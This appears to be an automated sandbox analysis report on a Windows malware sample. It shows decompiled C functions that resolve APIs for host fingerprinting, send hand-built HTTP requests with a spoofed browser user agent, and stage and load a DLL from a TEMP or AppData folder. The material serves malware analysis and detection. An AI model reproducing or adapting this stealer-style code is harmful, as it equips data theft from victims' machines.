GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404C0E), ref: 00404BCE

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 40f00df29b06f7f47e29b3e36becc3853c792834bf1450727d1b9494e9aa0756
Instruction ID: 4cf5545a5668d2b6934dff5f8e722f533bd1fe9dd63670d657e80fcd03084d14
Opcode Fuzzy Hash: 40f00df29b06f7f47e29b3e36becc3853c792834bf1450727d1b9494e9aa0756
Instruction Fuzzy Hash: 77F0C870A0420DAFE715DF91CD41ADEF77AF7C5714F50883AA610772D0E7B86A00C698

Uniqueness

Uniqueness Score: -1.00%

Function 00460AFD, Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

.dll, xrefs: 00460C54

Memory Dump Source

Source File: 00000000.00000002.544411405.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: false

Similarity

API ID:
String ID: .dll
API String ID: 0-2738580789
Opcode ID: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
Instruction ID: 73c0c16251436177f02bf79306a052536ebe9c04f4cc192ccf478af3a02a3547
Opcode Fuzzy Hash: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
Instruction Fuzzy Hash: 96518FB0900619DBCB28CF95C580ABFB7B1FF04705F10866ED4459B341E378AA84CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004A0408, Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

.dll, xrefs: 004A055F

Memory Dump Source

Source File: 00000000.00000002.544445284.00000000004A0000.00000040.00000001.sdmp, Offset: 004A0000, based on PE: false

Similarity

API ID:
String ID: .dll
API String ID: 0-2738580789
Opcode ID: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
Instruction ID: 657b4ad320a9e24a1069f8140d57c8fce872b2e636b3131ed58fa8d60178c7dd
Opcode Fuzzy Hash: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
Instruction Fuzzy Hash: 33518C30E00219EFCB24CF55C4806AEB7B1FF2A305F10816ED945AB741D778AA85CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00407AF0, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407AF0() {

				return  *[fs:0x30];
			}

0x00407af7

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00405668, Relevance: 217.3, APIs: 62, Strings: 62, Instructions: 307
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405668() {
				struct HINSTANCE__* _t108;
				struct HINSTANCE__* _t110;
				struct HINSTANCE__* _t112;
				struct HINSTANCE__* _t115;
				struct HINSTANCE__* _t118;
				_Unknown_base(*)()* _t119;

				 *0x41c678 = LoadLibraryA("kernel32.dll");
				 *0x41c67c = GetProcAddress( *0x41c678, "ExpandEnvironmentStringsW");
				 *0x41c680 = GetProcAddress( *0x41c678, "GetComputerNameW");
				 *0x41c684 = GetProcAddress( *0x41c678, "GlobalMemoryStatus");
				 *0x41c688 = GetProcAddress( *0x41c678, "CreateFileW");
				 *0x41c68c = GetProcAddress( *0x41c678, "GetFileSize");
				 *0x41c690 = GetProcAddress( *0x41c678, "CloseHandle");
				 *0x41c694 = GetProcAddress( *0x41c678, "ReadFile");
				 *0x41c698 = GetProcAddress( *0x41c678, "GetFileAttributesW");
				 *0x41c69c = GetProcAddress( *0x41c678, "CreateMutexA");
				 *0x41c6a0 = GetProcAddress( *0x41c678, "ReleaseMutex");
				 *0x41c6a4 = GetProcAddress( *0x41c678, "GetLastError");
				 *0x41c6a8 = GetProcAddress( *0x41c678, "GetCurrentDirectoryW");
				 *0x41c6ac = GetProcAddress( *0x41c678, "SetEnvironmentVariableW");
				 *0x41c6b0 = GetProcAddress( *0x41c678, "SetCurrentDirectoryW");
				 *0x41c6b4 = GetProcAddress( *0x41c678, "FindFirstFileW");
				 *0x41c6b8 = GetProcAddress( *0x41c678, "FindNextFileW");
				 *0x41c6bc = GetProcAddress( *0x41c678, "LocalFree");
				 *0x41c6c0 = GetProcAddress( *0x41c678, "GetTickCount");
				 *0x41c6c4 = GetProcAddress( *0x41c678, "CopyFileW");
				 *0x41c6c8 = GetProcAddress( *0x41c678, "FindClose");
				 *0x41c6cc = GetProcAddress( *0x41c678, "GlobalMemoryStatusEx");
				 *0x41c6d0 = GetProcAddress( *0x41c678, "CreateToolhelp32Snapshot");
				 *0x41c6d4 = GetProcAddress( *0x41c678, "Process32FirstW");
				 *0x41c6d8 = GetProcAddress( *0x41c678, "Process32NextW");
				 *0x41c6dc = GetProcAddress( *0x41c678, "GetModuleFileNameW");
				 *0x41c6e0 = GetProcAddress( *0x41c678, "SetDllDirectoryW");
				 *0x41c6e4 = GetProcAddress( *0x41c678, "GetLocaleInfoA");
				 *0x41c6e8 = GetProcAddress( *0x41c678, "GetLocalTime");
				 *0x41c6ec = GetProcAddress( *0x41c678, "GetTimeZoneInformation");
				 *0x41c6f0 = GetProcAddress( *0x41c678, "RemoveDirectoryW");
				 *0x41c6f4 = GetProcAddress( *0x41c678, "DeleteFileW");
				 *0x41c6f8 = GetProcAddress( *0x41c678, "GetLogicalDriveStringsA");
				 *0x41c6fc = GetProcAddress( *0x41c678, "GetDriveTypeA");
				 *0x41c700 = GetProcAddress( *0x41c678, "CreateProcessW");
				 *0x41c704 = LoadLibraryA("advapi32.dll");
				 *0x41c708 = GetProcAddress( *0x41c704, "GetUserNameW");
				 *0x41c70c = GetProcAddress( *0x41c704, "RegCreateKeyExW");
				 *0x41c710 = GetProcAddress( *0x41c704, "RegQueryValueExW");
				 *0x41c714 = GetProcAddress( *0x41c704, "RegCloseKey");
				 *0x41c718 = GetProcAddress( *0x41c704, "RegOpenKeyExW");
				 *0x41c71c = GetProcAddress( *0x41c704, "AllocateAndInitializeSid");
				 *0x41c720 = GetProcAddress( *0x41c704, "LookupAccountSidA");
				 *0x41c724 = GetProcAddress( *0x41c704, "CreateProcessAsUserW");
				 *0x41c728 = GetProcAddress( *0x41c704, "CheckTokenMembership");
				 *0x41c72c = GetProcAddress( *0x41c704, "RegOpenKeyW");
				 *0x41c730 = GetProcAddress( *0x41c704, "RegEnumKeyW");
				 *0x41c734 = GetProcAddress( *0x41c704, "RegEnumValueW");
				 *0x41c738 = GetProcAddress( *0x41c704, "CryptAcquireContextA");
				 *0x41c73c = GetProcAddress( *0x41c704, "CryptCreateHash");
				 *0x41c740 = GetProcAddress( *0x41c704, "CryptHashData");
				 *0x41c744 = GetProcAddress( *0x41c704, "CryptGetHashParam");
				 *0x41c748 = GetProcAddress( *0x41c704, "CryptDestroyHash");
				 *0x41c74c = GetProcAddress( *0x41c704, "CryptReleaseContext");
				 *0x41c750 = LoadLibraryA("user32.dll");
				_t108 =  *0x41c750; // 0x768f0000
				 *0x41c754 = GetProcAddress(_t108, "EnumDisplayDevicesW");
				_t110 =  *0x41c750; // 0x768f0000
				 *0x41c758 = GetProcAddress(_t110, "wvsprintfA");
				_t112 =  *0x41c750; // 0x768f0000
				 *0x41c75c = GetProcAddress(_t112, "GetKeyboardLayoutList");
				 *0x41c760 = LoadLibraryA("shell32.dll");
				_t115 =  *0x41c760; // 0x75390000
				 *0x41c764 = GetProcAddress(_t115, "ShellExecuteExW");
				 *0x41c768 = LoadLibraryA("ntdll.dll");
				_t118 =  *0x41c768; // 0x775e0000
				_t119 = GetProcAddress(_t118, "RtlComputeCrc32");
				 *0x41c76c = _t119;
				return _t119;
			}

0x0040567e
0x0040568d
0x0040569f
0x004056b1
0x004056c3
0x004056d5
0x004056e7
0x004056f9
0x0040570b
0x0040571d
0x0040572f
0x00405741
0x00405753
0x00405765
0x00405777
0x00405789
0x0040579b
0x004057ad
0x004057bf
0x004057d1
0x004057e3
0x004057f5
0x00405807
0x00405819
0x0040582b
0x0040583d
0x0040584f
0x00405861
0x00405873
0x00405885
0x00405897
0x004058a9
0x004058bb
0x004058cd
0x004058df
0x004058ee
0x004058fd
0x0040590f
0x00405921
0x00405933
0x00405945
0x00405957
0x00405969
0x0040597b
0x0040598d
0x0040599f
0x004059b1
0x004059c3
0x004059d5
0x004059e7
0x004059f9
0x00405a0b
0x00405a1d
0x00405a2f
0x00405a3e
0x00405a48
0x00405a53
0x00405a5d
0x00405a68
0x00405a72
0x00405a7d
0x00405a8c
0x00405a96
0x00405aa1
0x00405ab0
0x00405aba
0x00405ac0
0x00405ac5
0x00405acc

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00418711), ref: 00405679
GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 00405688
GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040569A
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 004056AC
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 004056BE
GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 004056D0
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 004056E2
GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056F4
GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 00405706
GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 00405718
GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 0040572A
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040573C
GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 0040574E
GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405760
GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405772
GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 00405784
GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 00405796
GetProcAddress.KERNEL32(00000000,LocalFree), ref: 004057A8
GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 004057BA
GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 004057CC
GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057DE
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057F0
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00405802
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00405814
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00405826
GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 00405838
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040584A
GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 0040585C
GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 0040586E
GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405880
GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405892
GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 004058A4
GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 004058B6
GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 004058C8
GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058DA
LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058E9
GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058F8
GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 0040590A
GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 0040591C
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0040592E
GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405940
GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405952
GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 00405964
GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 00405976
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00405988
GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 0040599A
GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 004059AC
GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 004059BE
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004059D0
GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059E2
GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059F4
GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 00405A06
GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 00405A18
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00405A2A
LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 00405A39
GetProcAddress.KERNEL32(768F0000,EnumDisplayDevicesW), ref: 00405A4E
GetProcAddress.KERNEL32(768F0000,wvsprintfA), ref: 00405A63
GetProcAddress.KERNEL32(768F0000,GetKeyboardLayoutList), ref: 00405A78
LoadLibraryA.KERNEL32(shell32.dll,768F0000,GetKeyboardLayoutList,768F0000,wvsprintfA,768F0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A87
GetProcAddress.KERNEL32(75390000,ShellExecuteExW), ref: 00405A9C
LoadLibraryA.KERNEL32(ntdll.dll,75390000,ShellExecuteExW,shell32.dll,768F0000,GetKeyboardLayoutList,768F0000,wvsprintfA,768F0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405AAB
GetProcAddress.KERNEL32(775E0000,RtlComputeCrc32), ref: 00405AC0

Strings

GetLogicalDriveStringsA, xrefs: 004058AE
SetDllDirectoryW, xrefs: 00405842
CryptDestroyHash, xrefs: 00405A10
Process32FirstW, xrefs: 0040580C
GetKeyboardLayoutList, xrefs: 00405A6D
GetLocaleInfoA, xrefs: 00405854
RegCloseKey, xrefs: 00405926
RegEnumValueW, xrefs: 004059B6
wvsprintfA, xrefs: 00405A58
RegQueryValueExW, xrefs: 00405914
CryptCreateHash, xrefs: 004059DA
DeleteFileW, xrefs: 0040589C
ShellExecuteExW, xrefs: 00405A91
CreateFileW, xrefs: 004056B6
CreateMutexA, xrefs: 00405710
CopyFileW, xrefs: 004057C4
user32.dll, xrefs: 00405A34
GlobalMemoryStatus, xrefs: 004056A4
CryptAcquireContextA, xrefs: 004059C8
GetFileSize, xrefs: 004056C8
CryptReleaseContext, xrefs: 00405A22
AllocateAndInitializeSid, xrefs: 0040594A
RegOpenKeyExW, xrefs: 00405938
RemoveDirectoryW, xrefs: 0040588A
SetCurrentDirectoryW, xrefs: 0040576A
advapi32.dll, xrefs: 004058E4
GetFileAttributesW, xrefs: 004056FE
RtlComputeCrc32, xrefs: 00405AB5
SetEnvironmentVariableW, xrefs: 00405758
CheckTokenMembership, xrefs: 00405980
ReadFile, xrefs: 004056EC
GetLocalTime, xrefs: 00405866
LookupAccountSidA, xrefs: 0040595C
CryptHashData, xrefs: 004059EC
GetCurrentDirectoryW, xrefs: 00405746
GetTickCount, xrefs: 004057B2
LocalFree, xrefs: 004057A0
CreateToolhelp32Snapshot, xrefs: 004057FA
GlobalMemoryStatusEx, xrefs: 004057E8
CreateProcessAsUserW, xrefs: 0040596E
shell32.dll, xrefs: 00405A82
GetDriveTypeA, xrefs: 004058C0
RegOpenKeyW, xrefs: 00405992
kernel32.dll, xrefs: 00405674
GetModuleFileNameW, xrefs: 00405830
ExpandEnvironmentStringsW, xrefs: 00405680
ReleaseMutex, xrefs: 00405722
EnumDisplayDevicesW, xrefs: 00405A43
CloseHandle, xrefs: 004056DA
CreateProcessW, xrefs: 004058D2
FindFirstFileW, xrefs: 0040577C
ntdll.dll, xrefs: 00405AA6
GetComputerNameW, xrefs: 00405692
FindClose, xrefs: 004057D6
RegCreateKeyExW, xrefs: 00405902
FindNextFileW, xrefs: 0040578E
GetLastError, xrefs: 00405734
CryptGetHashParam, xrefs: 004059FE
Process32NextW, xrefs: 0040581E
GetTimeZoneInformation, xrefs: 00405878
GetUserNameW, xrefs: 004058F0
RegEnumKeyW, xrefs: 004059A4

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
API String ID: 2238633743-3531362093
Opcode ID: dde84a1b0545234da602e85d90304d20f92d552cdb0d366e7dc8fbeb5297048c
Instruction ID: b4e9e9acb65dceb8197331e62ecd6ac44c6462922570a5848b60e957845f71d1
Opcode Fuzzy Hash: dde84a1b0545234da602e85d90304d20f92d552cdb0d366e7dc8fbeb5297048c
Instruction Fuzzy Hash: 6EB15BB1A90710AFD700BFA5DC86A6A37A8FB4A704351593BB550FF2E5D6789C008F9C

Uniqueness

Uniqueness Score: -1.00%

Function 00417820, Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 269
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00417820(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v432;
				intOrPtr _v444;
				short _v446;
				char _v448;
				char _v1472;
				char _v1476;
				char _v1480;
				char _v1484;
				char _v1488;
				char _v1492;
				void* _t144;
				void* _t151;
				void* _t186;
				struct HINSTANCE__* _t196;
				void* _t197;
				intOrPtr _t206;
				void* _t222;
				void* _t225;
				void* _t228;

				_v1476 = 0;
				_v1480 = 0;
				_v1484 = 0;
				_v1488 = 0;
				_v1492 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				E00403980(_v12);
				E00403980(_v16);
				E00403980(_a16);
				E00403980(_a12);
				_push(_t228);
				_push(0x417c31);
				_push( *[fs:eax]);
				 *[fs:eax] = _t228 + 0xfffffa30;
				E0040357C( &_v28, "wsock32.dll");
				_t196 = GetModuleHandleA(E004039E8( &_v28));
				if(_t196 == 0) {
					_t196 = LoadLibraryA(E004039E8( &_v28));
				}
				 *0x41cb38 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0xc]));
				 *0x41cb3c = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x17]));
				 *0x41cb40 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x25]));
				 *0x41cb44 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x2c]));
				 *0x41cb48 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x31]));
				 *0x41cb4c = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x36]));
				 *0x41cb50 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x3c]));
				 *0x41cb54 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x44]));
				if(_t196 != 0 &&  *0x41cb38 != 0 &&  *0x41cb3c != 0 &&  *0x41cb40 != 0 &&  *0x41cb44 != 0 &&  *0x41cb48 != 0 &&  *0x41cb4c != 0 &&  *0x41cb50 != 0 &&  *0x41cb54 != 0) {
					E004034E4( &_v24);
					_push( &_v432);
					_push(E00404F40(2, 2));
					if( *0x41cb38() == 0) {
						_t225 =  *0x41cb40(2, 1, 0);
						if(_t225 != 0xffffffff) {
							_v448 = 2;
							_t144 =  *0x41cb3c(E00403990(_v8));
							if(_t144 != 0) {
								_v444 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xc))))));
								_v446 =  *0x41cb4c(_a8);
								_t151 =  *0x41cb50(_t225,  &_v448, 0x10);
								_t243 = _t151;
								if(_t151 == 0) {
									E00403850();
									E00403D88( &_v1480, _v1484);
									E0041745C(E00403790(_a12), _t196,  &_v1488, _t225, _t243);
									E00403D88( &_v1492, _a12);
									E00403E78();
									E0040377C( &_v20, _v1476);
									 *0x41cb44(_t225, E004039E8( &_v20), E00403790(_v20), 0, _v1492, L"\r\n\r\n", _v1488, _v1480, "Content-Length: ", 0x417cd4, "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", "User-agent: ", "Connection: close\r\n", 0x417cd4, _a16, "Host: ", " HTTP/1.0\r\n", _v12, 0x417ca4, _v16);
									E004034E4( &_v24);
									do {
										E004034E4( &_v32);
										E004028E0( &_v1472, 0x400);
										_t197 =  *0x41cb48(_t225,  &_v1472, 0x400, 0);
										E004035D4( &_v32, _t197,  &_v1472);
										E00403798( &_v24, _v32);
									} while (_t197 > 0);
									 *0x41cb54(_t225);
									_push( &_v24);
									_push(E00403AD4(0x417d7c, _v24) + 4);
									_t186 = E00403790(_v24);
									_pop(_t222);
									E004039F0(_v24, _t186, _t222);
									E00403538(_a4, _v24);
								}
							}
						}
					}
				}
				_pop(_t206);
				 *[fs:eax] = _t206;
				_push(E00417C38);
				E00403BF4( &_v1492, 2);
				E004034E4( &_v1484);
				E00403BF4( &_v1480, 2);
				E00403508( &_v32, 7);
				return E00403508( &_a12, 2);
			}

0x0041782d
0x00417833
0x00417839
0x0041783f
0x00417845
0x0041784b
0x0041784e
0x00417851
0x00417854
0x00417857
0x0041785a
0x0041785d
0x00417863
0x0041786b
0x00417873
0x0041787b
0x00417883
0x0041788a
0x0041788b
0x00417890
0x00417893
0x0041789e
0x004178b1
0x004178b5
0x004178c5
0x004178c5
0x004178d9
0x004178f0
0x00417907
0x0041791e
0x00417935
0x0041794c
0x00417963
0x0041797a
0x00417981
0x004179f2
0x004179fd
0x00417a07
0x00417a10
0x00417a22
0x00417a27
0x00417a2d
0x00417a3f
0x00417a47
0x00417a54
0x00417a65
0x00417a76
0x00417a7c
0x00417a7e
0x00417ac5
0x00417ad6
0x00417aef
0x00417b08
0x00417b1e
0x00417b2c
0x00417b46
0x00417b4f
0x00417b54
0x00417b57
0x00417b69
0x00417b83
0x00417b90
0x00417b9b
0x00417ba0
0x00417ba5
0x00417bae
0x00417bbf
0x00417bc3
0x00417bcd
0x00417bce
0x00417bd9
0x00417bd9
0x00417a7e
0x00417a47
0x00417a27
0x00417a10
0x00417be0
0x00417be3
0x00417be6
0x00417bf6
0x00417c01
0x00417c11
0x00417c1e
0x00417c30

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00417C31,?,00000000,00000000,?,00418203,00000000,?,?,?), ref: 004178AC
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00417C31,?,00000000,00000000,?,00418203,00000000,?,?,?), ref: 004178C0
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004178D4
GetProcAddress.KERNEL32(00000000,-00000017), ref: 004178EB
GetProcAddress.KERNEL32(00000000,-00000025), ref: 00417902
GetProcAddress.KERNEL32(00000000,-0000002C), ref: 00417919
GetProcAddress.KERNEL32(00000000,-00000031), ref: 00417930
GetProcAddress.KERNEL32(00000000,-00000036), ref: 00417947
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041795E
GetProcAddress.KERNEL32(00000000,-00000044), ref: 00417975

Strings

Content-Length: , xrefs: 00417AB5
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 00417AAB
Connection: close, xrefs: 00417AA1
wsock32.dll, xrefs: 00417899
HTTP/1.0, xrefs: 00417A8F
User-agent: , xrefs: 00417AA6
, xrefs: 00417BB2
Host: , xrefs: 00417A94
, xrefs: 00417AFA

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
API String ID: 384173800-3355491746
Opcode ID: 2e791c19a78f51646ad9b3e062a26aed4a75e7cdfad1e0aea646d3ea52340998
Instruction ID: 40f87eb91c0466ae62d4265024b0cddbd223269e9b4c2b0dfc8b3cbba4f3f7f6
Opcode Fuzzy Hash: 2e791c19a78f51646ad9b3e062a26aed4a75e7cdfad1e0aea646d3ea52340998
Instruction Fuzzy Hash: 22B101B19042099BDB10EF65DC86ADFBBB8BB04309F10407BE505F22D1DB78AA458F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040965C, Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 234
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040965C(intOrPtr* __eax, void* __ebx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v117;
				void* _t18;
				void* _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t55;
				intOrPtr* _t60;
				intOrPtr* _t65;
				intOrPtr* _t70;
				intOrPtr* _t75;
				intOrPtr* _t80;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t100;
				intOrPtr* _t105;
				intOrPtr* _t110;
				intOrPtr* _t115;
				intOrPtr* _t132;
				intOrPtr* _t134;
				intOrPtr _t144;
				intOrPtr _t153;
				intOrPtr _t156;

				 *__eax =  *__eax + __eax;
				_t18 = __eax +  *__eax;
				 *_t18 =  *_t18 + _t18;
				asm("das");
				 *_t18 =  *_t18 + _t18;
				_t1 =  &_v117;
				 *_t1 = _v117 + __edx;
				_t156 =  *_t1;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_v8 = _t18;
				E00403980(_v8);
				_push(_t153);
				_push(0x409963);
				_push( *[fs:eax]);
				 *[fs:eax] = _t153;
				 *0x41b0d8 = 0;
				E004062FC(L"%TEMP%\\2fda\\",  &_v12, _t156);
				E00403C18(0x41ca5c, _v12);
				CreateDirectoryW(E00403D98( *0x41ca5c), 0);
				E004094E0( *0x41ca5c, 0x41ca58, _v8, 0x41ca5c, _t156);
				_t132 =  *0x41b3c4; // 0x41c7ac
				E00403E14( &_v16,  *_t132,  *0x41ca5c, _t156);
				_t34 = E0040776C(_v16, 0x41ca58,  *_t132);
				_t157 = _t34;
				if(_t34 == 0) {
					E004062FC(L"%appdata%\\2fda\\",  &_v20, _t157);
					E00403C18(0x41ca5c, _v20);
					CreateDirectoryW(E00403D98( *0x41ca5c), 0);
					E004094E0( *0x41ca5c, 0x41ca58, _v8, 0x41ca5c, _t157);
				}
				_t37 =  *0x41b3ac; // 0x41c6ac
				 *((intOrPtr*)( *_t37))(L"PATH", E00403D98( *0x41ca5c));
				_t42 =  *0x41b320; // 0x41c6b0
				 *((intOrPtr*)( *_t42))(E00403D98( *0x41ca5c));
				_t134 =  *0x41b3c4; // 0x41c7ac
				E00403E14( &_v24,  *_t134,  *0x41ca5c, _t157);
				 *0x41ca58 = LoadLibraryExW(E00403D98(_v24), 0, 8);
				if( *0x41ca58 != 0) {
					_t55 =  *0x41b37c; // 0x41c994
					 *0x41ca20 = GetProcAddress( *0x41ca58, E00403990( *_t55));
					_t60 =  *0x41b42c; // 0x41c998
					 *0x41ca24 = GetProcAddress( *0x41ca58, E00403990( *_t60));
					_t65 =  *0x41b14c; // 0x41c99c
					 *0x41ca28 = GetProcAddress( *0x41ca58, E00403990( *_t65));
					_t70 =  *0x41b214; // 0x41c9a0
					 *0x41ca2c = GetProcAddress( *0x41ca58, E00403990( *_t70));
					_t75 =  *0x41b418; // 0x41c9a4
					 *0x41ca30 = GetProcAddress( *0x41ca58, E00403990( *_t75));
